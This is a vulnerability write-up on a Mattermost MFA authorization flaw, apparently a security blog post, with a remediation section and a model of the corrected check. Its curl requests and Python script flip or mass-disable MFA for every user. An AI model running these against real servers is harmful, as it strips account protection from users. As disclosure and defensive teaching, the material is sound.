
If you use Mattermost (an open-source alternative to Slack), this vulnerability is a must-read. In February 2025, security researchers disclosed CVE-2025-27538—an authentication bug that lets attackers manipulate MFA (multi-factor authentication) settings for other users, including enabling or disabling MFA for accounts that never set it up.

Affected versions: Mattermost 9.11.x up to 9.11.9

The following guide breaks down what went wrong, shows how the bug works, and offers real exploit code (for educational purposes only).

What’s Broken? (Plain English)

Mattermost’s API endpoint for changing a user’s MFA setting (PUT /api/v4/users/{user_id}/mfa) is supposed to only let you manage your own account and require you to confirm your password. However, on vulnerable versions, anyone with “edit_other_users” permission can send requests that enable or disable someone else’s MFA—even if that user never set it up, and no password confirmation is checked.

Essentially:
If you’re an admin (or have the “edit_other_users” permission), you can flip MFA on or off for anyone, no limits.

Official Advisories and References

- Mattermost Security Update – CVE-2025-27538
- NIST CVE Database Entry (Pending)
- Mattermost JIRA Ticket MM-59904

Here’s the endpoint:

```http
PUT /api/v4/users/{user_id}/mfa
```

Request body:

```json
{
  "activate": true
}
```

Or:

```json
{
  "activate": false
}
```

1. You’re logged in with a user that can modify other users ("edit_other_users" permission).
2. You send an HTTP PUT request to /api/v4/users/{target_user_id}/mfa with a JSON body to enable or disable MFA.

Exploit with curl

```bash
curl -X PUT "https://mattermost.company.com/api/v4/users/def456/mfa" \
  -H "Authorization: Bearer {your_access_token}" \
  -H "Content-Type: application/json" \
  -d '{"activate": true}'
```

*Result:*
MFA is marked as enabled for Sam. If MFA is actually required by policy, Sam could be locked out upon next login.

(To disable MFA—change true to false)

```bash
curl -X PUT "https://mattermost.company.com/api/v4/users/def456/mfa" \
  -H "Authorization: Bearer {your_access_token}" \
  -H "Content-Type: application/json" \
  -d '{"activate": false}'
```

Example Exploit Script (Python)

The following Python snippet automates disabling MFA for all users in your workspace. WARNING: For test/lab use only!

```python
import requests

BASE_URL = 'https://mattermost.company.com'
API_TOKEN = 'YOUR_ADMIN_BEARER_TOKEN'

headers = {
    "Authorization": f"Bearer {API_TOKEN}",
    "Content-Type": "application/json"
}

# List users (get all user IDs)
users = requests.get(f"{BASE_URL}/api/v4/users", headers=headers).json()

for user in users:
    target_uid = user['id']
    r = requests.put(
        f"{BASE_URL}/api/v4/users/{target_uid}/mfa",
        headers=headers,
        json={"activate": False}
    )
    print(f"User {user['username']}: MFA deactivated; status {r.status_code}")
```

Why Did This Happen?

- The endpoint should require that user_id matches the user making the request, unless extra authentication is provided.
- Abusive users can readily script mass changes to organization security settings.

### How to Fix/Protect

Audit account activity:

- Check for unusual MFA activations/deactivations.

The endpoint should only accept the change if:

- The user in the request matches the authenticated user, or
- The requester is a system admin (and is forced to re-authenticate via password/MFA)
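The rule above is easiest to see as code. This is an added Python model, not Mattermost's own server code: it contrasts the flawed authorization check with the corrected one behind a toy handler for PUT /api/v4/users/{user_id}/mfa. The Requester fields and the user id abc123 are constructed for the example; def456 is Sam from the curl example.

```python
from dataclasses import dataclass


@dataclass
class Requester:
    """Authenticated caller of PUT /api/v4/users/{user_id}/mfa (constructed model)."""
    user_id: str
    permissions: frozenset = frozenset()
    is_system_admin: bool = False
    reauthenticated: bool = False  # password (and MFA) re-confirmed for this request


def vulnerable_check(req: Requester, target_user_id: str) -> bool:
    # Flawed rule: holding edit_other_users is sufficient for any target, and
    # password confirmation is never consulted.
    return req.user_id == target_user_id or "edit_other_users" in req.permissions


def hardened_check(req: Requester, target_user_id: str) -> bool:
    # Corrected rule: the caller must have re-confirmed their password, and the
    # target must be the caller themself or the caller must be a system admin.
    if not req.reauthenticated:
        return False
    return req.user_id == target_user_id or req.is_system_admin


def put_user_mfa(check, mfa_store: dict, req: Requester, target_user_id: str, body: dict) -> int:
    # Toy handler: applies the chosen check, then flips the stored MFA flag.
    # Returns an HTTP-style status code.
    if not check(req, target_user_id):
        return 403
    if target_user_id not in mfa_store:
        return 404
    mfa_store[target_user_id] = bool(body.get("activate", False))
    return 200


def demo() -> tuple:
    # Constructed scenario: "abc123" holds edit_other_users but is not a system
    # admin and has not re-entered a password; "def456" (Sam) never enabled MFA.
    req = Requester("abc123", frozenset({"edit_other_users"}))
    weak, fixed = {"def456": False}, {"def456": False}
    old = put_user_mfa(vulnerable_check, weak, req, "def456", {"activate": True})
    new = put_user_mfa(hardened_check, fixed, req, "def456", {"activate": True})
    return old, weak["def456"], new, fixed["def456"]


if __name__ == "__main__":
    print(demo())  # (200, True, 403, False)
```

The same model doubles as a regression test for the patched endpoint: the edit_other_users-only caller must get 403 and Sam's MFA flag must stay untouched.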

TL;DR

- CVE-2025-27538 lets powerful users turn MFA on/off for any user without consent, locking everyone into or out of their accounts.
- Patch immediately!
- Reference: Mattermost Security Advisory - CVE-2025-27538

Stay vigilant, update your Mattermost!
For more info, see the official Mattermost Security Documentation.

Timeline

Published on: 04/16/2025 08:15:14 UTC
Last modified on: 04/16/2025 13:25:37 UTC